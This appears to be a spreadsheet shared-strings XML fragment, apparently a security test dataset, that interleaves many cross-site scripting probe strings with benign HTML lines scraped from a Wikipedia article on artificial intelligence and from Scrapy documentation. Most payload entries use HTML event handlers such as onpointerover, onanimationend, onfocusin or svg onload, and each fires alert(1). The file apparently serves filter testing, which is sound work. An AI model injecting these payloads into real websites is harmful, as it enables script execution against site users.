  <si>
    <t>&lt;style onpointerover=alert(1)&gt;XSS&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;form onmouseenter="alert(1)"&gt;test&lt;/form&gt;</t>
  </si>
  <si>
    <t>&lt;isindex onmouseup="alert(1)"&gt;test&lt;/isindex&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;nobr style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/nobr&gt;</t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;Main article: &lt;a href="/wiki/Affective_computing" title="Affective computing"&gt;Affective computing &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;tfoot onpointermove=alert(1)&gt;XSS&lt;/tfoot&gt;</t>
  </si>
  <si>
    <t>&lt;input3 onpointerenter=alert(1)&gt;XSS&lt;/input3&gt;</t>
  </si>
  <si>
    <t>&lt;button id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/button&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;svg onclick="alert(1)"&gt;test&lt;/svg&gt;</t>
  </si>
  <si>
    <t>&lt;menuitem onmouseleave="alert(1)"&gt;test&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">        &lt;script src="_static/language_data.js"&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;a onbeforecopy="alert(1)" contenteditable&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;xmp oncontextmenu="alert(1)"&gt;test&lt;/xmp&gt;</t>
  </si>
  <si>
    <t>&lt;del onpointerdown=alert(1)&gt;XSS&lt;/del&gt;</t>
  </si>
  <si>
    <t>&lt;em onpointerout=alert(1)&gt;XSS&lt;/em&gt;</t>
  </si>
  <si>
    <t>&lt;ruby onkeyup="alert(1)" contenteditable&gt;test&lt;/ruby&gt;</t>
  </si>
  <si>
    <t>&lt;summary onpointerenter=alert(1)&gt;XSS&lt;/summary&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;a class="mw-jump-link" href="#p-search"&gt;Jump to search &lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Radio-frequency_identification" title="Radio-frequency identification"&gt;RFID &lt;/a&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-116"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-116"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;isindex style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/isindex&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation news"&gt;&lt;a rel="nofollow" class="external text" href="https://www.economist.com/news/special-report/21700758-will-smarter-machines-cause-mass-unemployment-automation-and-anxiety"&gt;"Automation and anxiety" &lt;/a&gt;. &lt;i&gt;The Economist &lt;/i&gt;. 9 May 2015&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;13 January </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-361"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-361"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;img src/onerror=alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;col onkeypress="alert(1)" contenteditable&gt;test&lt;/col&gt;</t>
  </si>
  <si>
    <t>&lt;html onbeforecopy="alert(1)" contenteditable&gt;test&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;shadow ondrop=alert(1) contenteditable&gt;drop here&lt;/shadow&gt;</t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="topics/jobs.html"&gt;&lt;span class="doc"&gt;Jobs: pausing and resuming crawls</t>
  </si>
  <si>
    <t>&lt;base oncut="alert(1)" contenteditable&gt;test&lt;/base&gt;</t>
  </si>
  <si>
    <t>&lt;menuitem id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/menuitem&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;Main articles: &lt;a href="/wiki/Search_algorithm" title="Search algorithm"&gt;Search algorithm &lt;/a&gt;, &lt;a href="/wiki/Mathematical_optimization" title="Mathematical optimization"&gt;Mathematical optimization &lt;/a&gt;, and &lt;a href="/wiki/Evolutionary_computation" title="Evolutionary computation"&gt;Evolutionary computation &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=29" title="Edit section: Probabilistic methods for uncertain reasoning"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;dt onmousedown="alert(1)"&gt;test&lt;/dt&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div class="magnify"&gt;&lt;a href="/wiki/File:Laproscopic_Surgery_Robot.jpg" class="internal" title="Enlarge"&gt; &lt;/a&gt; &lt;/div&gt;A patient-side surgical arm of &lt;a href="/wiki/Da_Vinci_Surgical_System" title="Da Vinci Surgical System"&gt;Da Vinci Surgical System &lt;/a&gt; &lt;/div&gt; &lt;/div&gt; &lt;/div&gt;&lt;p&gt;AI in healthcare is often used for classification, whether to automate initial evaluation of a CT scan or EKG or to identify high risk patients for population health. The breadth of applications is rapidly increasing.</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div id="Philosophy_of_mind" style="font-size:114%;margin:0 4em"&gt;&lt;a href="/wiki/Philosophy_of_mind" title="Philosophy of mind"&gt;Philosophy of mind &lt;/a&gt; &lt;/div&gt; &lt;/th&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:1%"&gt;Theories &lt;/th&gt;&lt;td class="navbox-list navbox-odd" style="text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;picture onkeypress="alert(1)" contenteditable&gt;test&lt;/picture&gt;</t>
  </si>
  <si>
    <t>&lt;nav onpointerenter=alert(1)&gt;XSS&lt;/nav&gt;</t>
  </si>
  <si>
    <t>&lt;datalist onpointerup=alert(1)&gt;XSS&lt;/datalist&gt;</t>
  </si>
  <si>
    <t>&lt;aside draggable="true" ondragend="alert(1)"&gt;test&lt;/aside&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;bdi style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/bdi&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;div id="contentSub"&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;multicol onload=alert(1)&gt;&lt;/multicol&gt;</t>
  </si>
  <si>
    <t>&lt;noembed id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/noembed&gt;</t>
  </si>
  <si>
    <t>&lt;menu id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/menu&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;nobr id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/nobr&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-52"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-52"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;nextid id=x tabindex=1 onfocus=alert(1)&gt;&lt;/nextid&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=4" title="Edit section: Challenges"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;picture onkeyup="alert(1)" contenteditable&gt;test&lt;/picture&gt;</t>
  </si>
  <si>
    <t>&lt;big onclick="alert(1)"&gt;test&lt;/big&gt;</t>
  </si>
  <si>
    <t>&lt;s draggable="true" ondrag="alert(1)"&gt;test&lt;/s&gt;</t>
  </si>
  <si>
    <t>&lt;plaintext onmouseover="alert(1)"&gt;test&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t>&lt;thead draggable="true" ondragleave="alert(1)"&gt;test&lt;/thead&gt;</t>
  </si>
  <si>
    <t>&lt;bdo onmouseout="alert(1)"&gt;test&lt;/bdo&gt;</t>
  </si>
  <si>
    <t>&lt;isindex onpointerleave=alert(1)&gt;XSS&lt;/isindex&gt;</t>
  </si>
  <si>
    <t>&lt;progress onmouseleave="alert(1)"&gt;test&lt;/progress&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;a href="/wiki/Wikidata" title="Wikidata"&gt;Wikidata &lt;/a&gt;&lt;span class="nowrap"&gt;&amp;#160; </t>
  </si>
  <si>
    <t>&lt;tbody onpaste="alert(1)" contenteditable&gt;test&lt;/tbody&gt;</t>
  </si>
  <si>
    <t>&lt;ruby onmousedown="alert(1)"&gt;test&lt;/ruby&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;picture ondragover=alert(1) contenteditable&gt;drop here&lt;/picture&gt;</t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="topics/leaks.html"&gt;Debugging memory leaks&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;picture onkeydown="alert(1)" contenteditable&gt;test&lt;/picture&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;map id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/map&gt;</t>
  </si>
  <si>
    <t>&lt;header onpointerdown=alert(1)&gt;XSS&lt;/header&gt;</t>
  </si>
  <si>
    <t>&lt;dir onpointerenter=alert(1)&gt;XSS&lt;/dir&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;dt onload=alert(1)&gt;&lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;span ondblclick="alert(1)"&gt;test&lt;/span&gt;</t>
  </si>
  <si>
    <t>&lt;blink onmouseover="alert(1)"&gt;test&lt;/blink&gt;</t>
  </si>
  <si>
    <t>&lt;button draggable="true" ondrag="alert(1)"&gt;test&lt;/button&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Geography_of_robotics" title="Geography of robotics"&gt;Geography &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;img alt="List-Class article" src="//upload.wikimedia.org/wikipedia/en/thumb/d/db/Symbol_list_class.svg/16px-Symbol_list_class.svg.png" decoding="async" title="List-Class article" width="16" height="16" srcset="//upload.wikimedia.org/wikipedia/en/thumb/d/db/Symbol_list_class.svg/23px-Symbol_list_class.svg.png 1.5x, //upload.wikimedia.org/wikipedia/en/thumb/d/db/Symbol_list_class.svg/31px-Symbol_list_class.svg.png 2x" data-file-width="180" data-file-height="185" /&gt; &lt;b&gt;&lt;a href="/wiki/List_of_emerging_technologies" title="List of emerging technologies"&gt;List of emerging technologies &lt;/a&gt; &lt;/b&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="topics/api.html"&gt;&lt;span class="doc"&gt;Core API</t>
  </si>
  <si>
    <t>&lt;address onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/address&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Phase-change_memory" title="Phase-change memory"&gt;PRAM &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;time id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/time&gt;</t>
  </si>
  <si>
    <t>&lt;noembed id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/noembed&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/History_of_artificial_intelligence" title="History of artificial intelligence"&gt;History &lt;/a&gt; &lt;/th&gt; &lt;/tr&gt;&lt;tr&gt;&lt;td class="plainlist" style="padding:0 0.1em 0.4em"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">    &lt;div class="rst-other-versions"&gt;</t>
  </si>
  <si>
    <t>&lt;embed src=1 onerror=alert(1) type=image/gif&gt;</t>
  </si>
  <si>
    <t>&lt;svg onmouseup="alert(1)"&gt;test&lt;/svg&gt;</t>
  </si>
  <si>
    <t>&lt;div onmouseout="alert(1)"&gt;test&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;ul onmouseup="alert(1)"&gt;test&lt;/ul&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">			Languages</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;600–604 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Search_algorithm" title="Search algorithm"&gt;Search algorithms &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;p&gt;AI, like electricity or the steam engine, is a general purpose technology. There is no consensus on how to characterize which tasks AI tends to excel at.&lt;sup id="cite_ref-276" class="reference"&gt;&lt;a href="#cite_note-276"&gt;&amp;#91;265&amp;#93; &lt;/a&gt; &lt;/sup&gt; While projects such as &lt;a href="/wiki/AlphaZero" title="AlphaZero"&gt;AlphaZero &lt;/a&gt; have succeeded in generating their own knowledge from scratch, many other machine learning projects require large training datasets.&lt;sup id="cite_ref-277" class="reference"&gt;&lt;a href="#cite_note-277"&gt;&amp;#91;266&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-278" class="reference"&gt;&lt;a href="#cite_note-278"&gt;&amp;#91;267&amp;#93; &lt;/a&gt; &lt;/sup&gt; Researcher &lt;a href="/wiki/Andrew_Ng" title="Andrew Ng"&gt;Andrew Ng &lt;/a&gt; has suggested, as a "highly imperfect rule of thumb", that "almost anything a typical human can do with less than one second of mental thought, we can probably now or in the near future automate using AI."&lt;sup id="cite_ref-279" class="reference"&gt;&lt;a href="#cite_note-279"&gt;&amp;#91;268&amp;#93; &lt;/a&gt; &lt;/sup&gt; &lt;a href="/wiki/Moravec%27s_paradox" title="Moravec&amp;#39;s paradox"&gt;Moravec's paradox &lt;/a&gt; suggests that AI lags humans at many tasks that the human brain has specifically evolved to perform well.&lt;sup id="cite_ref-The_Economist_135-1" class="reference"&gt;&lt;a href="#cite_note-The_Economist-135"&gt;&amp;#91;132&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Huw_Price" title="Huw Price"&gt;Huw Price &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:1%"&gt;&lt;a href="/wiki/Machine_learning" title="Machine learning"&gt;Machine learning &lt;/a&gt; &lt;/th&gt;&lt;td class="navbox-list navbox-odd" style="text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;video oncanplay=alert(1)&gt;&lt;source src="validvideo.mp4" type="video/mp4"&gt;&lt;/video&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;sup id="cite_ref-139" class="reference"&gt;&lt;a href="#cite_note-139"&gt;&amp;#91;136&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div style="padding: 0.75em 0; text-align: center;"&gt;&lt;b style="display:block;"&gt;Artificial intelligence &lt;/b&gt;at Wikipedia's &lt;a href="/wiki/Wikipedia:Wikimedia_sister_projects" title="Wikipedia:Wikimedia sister projects"&gt;&lt;span id="sister-projects"&gt;sister projects </t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;code onload=alert(1)&gt;&lt;/code&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFCrevier1993"&gt;Crevier 1993 &lt;/a&gt;, pp.&amp;#160;168 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Computational_chemistry" title="Computational chemistry"&gt;Computational chemistry &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;Populate your items with the extracted data.&lt;/dd&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Problems_of_AI-15"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-Problems_of_AI_15-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-Problems_of_AI_15-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-Problems_of_AI_15-2"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;c &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;shadow onpointerout=alert(1)&gt;XSS&lt;/shadow&gt;</t>
  </si>
  <si>
    <t>&lt;audio draggable="true" ondragenter="alert(1)"&gt;test&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;rb id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/rb&gt;</t>
  </si>
  <si>
    <t>&lt;bgsound onpointerup=alert(1)&gt;XSS&lt;/bgsound&gt;</t>
  </si>
  <si>
    <t>&lt;keygen id=x onfocusin=alert(1)&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Roberts-147"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-Roberts_147-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-Roberts_147-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-Roberts_147-2"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;c &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFNilsson1998"&gt;Nilsson 1998 &lt;/a&gt;, chpt. 3.3, 10.3, 17.5, 20 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;xmp ondragover=alert(1) contenteditable&gt;drop here&lt;/xmp&gt;</t>
  </si>
  <si>
    <t>&lt;main oncopy="alert(1)" contenteditable&gt;test&lt;/main&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Alfred_North_Whitehead" title="Alfred North Whitehead"&gt;Alfred North Whitehead &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;rp onpointerout=alert(1)&gt;XSS&lt;/rp&gt;</t>
  </si>
  <si>
    <t>&lt;bgsound onclick="alert(1)"&gt;test&lt;/bgsound&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a rel="nofollow" class="external text" href="https://www.washingtonpost.com/news/innovations/wp/2016/03/10/googles-psychedelic-paint-brush-raises-the-oldest-question-in-art/"&gt;Retrieved July 29 &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;applet draggable="true" ondragend="alert(1)"&gt;test&lt;/applet&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;(1910) &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFACM1998"&gt;ACM 1998 &lt;/a&gt;, I.2.1 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;output onpointerdown=alert(1)&gt;XSS&lt;/output&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;caption onload=alert(1)&gt;&lt;/caption&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-contemporary_agi-146"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-contemporary_agi_146-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;center id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/center&gt;</t>
  </si>
  <si>
    <t>&lt;tbody onkeyup="alert(1)" contenteditable&gt;test&lt;/tbody&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Privileged_access" title="Privileged access"&gt;Privileged access &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;td id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/td&gt;</t>
  </si>
  <si>
    <t>&lt;xmp onmouseleave="alert(1)"&gt;test&lt;/xmp&gt;</t>
  </si>
  <si>
    <t>&lt;nobr onbeforecopy="alert(1)" contenteditable&gt;test&lt;/nobr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-374"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-374"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;figcaption onbeforepaste="alert(1)" contenteditable&gt;test&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;audio id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;q onclick="alert(1)"&gt;test&lt;/q&gt;</t>
  </si>
  <si>
    <t>&lt;input onpointerleave=alert(1)&gt;XSS&lt;/input&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Neutral_monism" title="Neutral monism"&gt;Neutral monism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=the+Guardian&amp;amp;rft.atitle=The+superhero+of+artificial+intelligence%3A+can+this+genius+keep+it+in+check%3F&amp;amp;rft.date=2016-02-16&amp;amp;rft_id=https%3A%2F%2Fwww.theguardian.com%2Ftechnology%2F2016%2Ffeb%2F16%2Fdemis-hassabis-artificial-intelligence-deepmind-alphago&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;input onmouseleave="alert(1)"&gt;test&lt;/input&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;According to one overview,&lt;sup id="cite_ref-scholarpedia_249-0" class="reference"&gt;&lt;a href="#cite_note-scholarpedia-249"&gt;&amp;#91;238&amp;#93; &lt;/a&gt; &lt;/sup&gt; the expression "Deep Learning" was introduced to the &lt;a href="/wiki/Machine_learning" title="Machine learning"&gt;machine learning &lt;/a&gt; community by &lt;a href="/wiki/Rina_Dechter" title="Rina Dechter"&gt;Rina Dechter &lt;/a&gt; in 1986&lt;sup id="cite_ref-dechter1986_250-0" class="reference"&gt;&lt;a href="#cite_note-dechter1986-250"&gt;&amp;#91;239&amp;#93; &lt;/a&gt; &lt;/sup&gt; and gained traction after</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/tr&gt;&lt;tr&gt;&lt;td style="text-align:right;font-size:115%"&gt;</t>
  </si>
  <si>
    <t>&lt;dialog oncopy="alert(1)" contenteditable&gt;test&lt;/dialog&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;table onload=alert(1)&gt;&lt;/table&gt;</t>
  </si>
  <si>
    <t>&lt;tt draggable="true" ondrag="alert(1)"&gt;test&lt;/tt&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Washington+Post&amp;amp;rft.atitle=Review+%7C+How+two+AI+superpowers+%E2%80%93+the+U.S.+and+China+%E2%80%93+battle+for+supremacy+in+the+field&amp;amp;rft.date=2018-11-02&amp;amp;rft_id=https%3A%2F%2Fwww.washingtonpost.com%2Foutlook%2Fin-the-race-for-supremacy-in-artificial-intelligence-its-us-innovation-vs-chinese-ambition%2F2018%2F11%2F02%2F013e0030-b08c-11e8-aed9-001309990777_story.html&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="topics/leaks.html"&gt;&lt;span class="doc"&gt;Debugging memory leaks</t>
  </si>
  <si>
    <t>&lt;animatetransform onpointerout=alert(1)&gt;XSS&lt;/animatetransform&gt;</t>
  </si>
  <si>
    <t>&lt;div id="mw-navigation"&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;bdi id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/bdi&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;.  In Foss, B. M. (ed.). &lt;i&gt;New horizons in psychology &lt;/i&gt;. Harmondsworth: Penguin. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=bookitem&amp;amp;rft.atitle=Reasoning&amp;amp;rft.btitle=New+horizons+in+psychology&amp;amp;rft.place=Harmondsworth&amp;amp;rft.pub=Penguin&amp;amp;rft.date=1966&amp;amp;rft.aulast=Wason&amp;amp;rft.aufirst=P.+C.&amp;amp;rft.au=Shapiro%2C+D.&amp;amp;rft_id=https%3A%2F%2Farchive.org%2Fdetails%2Fnewhorizonsinpsy0000foss&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;dfn onmousemove="alert(1)"&gt;test&lt;/dfn&gt;</t>
  </si>
  <si>
    <t>&lt;cite oncopy="alert(1)" contenteditable&gt;test&lt;/cite&gt;</t>
  </si>
  <si>
    <t>&lt;main onpointerdown=alert(1)&gt;XSS&lt;/main&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;header style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/header&gt;</t>
  </si>
  <si>
    <t>&lt;rt onclick="alert(1)"&gt;test&lt;/rt&gt;</t>
  </si>
  <si>
    <t>&lt;script draggable="true" ondragstart="alert(1)"&gt;test&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;basefont onpointerleave=alert(1)&gt;XSS&lt;/basefont&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">          &lt;dd&gt;&lt;a href="/en/1.8/"&gt;1.8&lt;/a&gt;&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;body onafterprint=alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;rt onbeforecopy="alert(1)" contenteditable&gt;test&lt;/rt&gt;</t>
  </si>
  <si>
    <t>&lt;dt onmousemove="alert(1)"&gt;test&lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;noframes id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/noframes&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">         &lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;s onbeforecut="alert(1)" contenteditable&gt;test&lt;/s&gt;</t>
  </si>
  <si>
    <t>&lt;plaintext oncopy="alert(1)" contenteditable&gt;test&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t>&lt;form id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/form&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
